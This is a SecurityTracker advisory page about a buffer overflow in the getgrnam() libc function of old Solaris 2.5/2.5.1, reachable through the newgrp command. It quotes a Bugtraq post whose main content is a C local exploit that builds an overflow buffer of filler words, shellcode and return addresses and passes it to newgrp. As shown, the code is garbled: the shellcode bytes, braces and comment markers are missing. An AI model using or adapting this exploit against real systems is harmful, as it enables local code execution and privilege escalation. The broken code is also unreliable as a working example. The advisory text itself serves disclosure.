Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   OS (UNIX)  >   Getgrnam() function Vendors:   Sun
Solaris getgrnam() Function Call Allows Local Execution of Arbitrary Code
SecurityTracker Alert ID:  1000539
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 5 2001
Impact:   Execution of arbitrary code via local system
Exploit Included:  Yes  
Version(s): Solaris 2.5/2.5.1 without patch
Description:   It has been reported that the getgrnam() function in old versions of Solaris (2.5/2.5.1) contain a buffer overflow that permit the local execution of arbitrary code. The getgrnam() function searches the group database for an entry with a matching name.

According to the report, this vulnerability may be exploited with the newgrp command.

Impact:   A malicious user with local access could cause arbitrary code to be executed on the host.
Solution:   Upgrade to a more recent version.
Vendor URL: (Links to External Site)
Cause:   Boundary error
Underlying OS:  UNIX (Solaris - SunOS)
Underlying OS Comments:  Solaris 2.5/2.5.1 without patch

Message History:   None.

 Source Message Contents

Subject:  Old getgrnam() Solaris 2.5 vulnerability


Old versions of Solaris, 2.5/2.5.1 (without patch) contain an
exploitable buffer overflow in getgrnam() libc function.
Sorry if this is already know, it seems an old problem but i failed
searching it in the bugtraq archives.
This vulnerability may be used in newgrp command.


Pablo Sor

#include <stdio.h>
#include <sys/types.h>

   getgrnam() function overflow.

   works against Solaris 2.5.1 (SPARC)
   default offset should work.

   Pablo Sor, Buenos Aires, Argentina.


u_char shell[] =
u_long get_sp(void)
   __asm__("mov %sp,%i0 \n");

void main()

 long *p;
 long addr;
 char buf[8300];
 int i;

 addr = get_sp()-8096;
 printf("Jumping to address %p\n",addr);
 p = (long *) buf;
 for (i=0;i<2050;++i) *(p++) = 0xa61cc013;
 for (i=0;i<strlen(shell);++i) buf[104+i] = shell[i];
 p = (long *) &buf[8160];
 for (i=0;i<30;++i) *(p++) = addr;
 execl("/usr/bin/newgrp","newgrp",buf,(char *)0);



Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC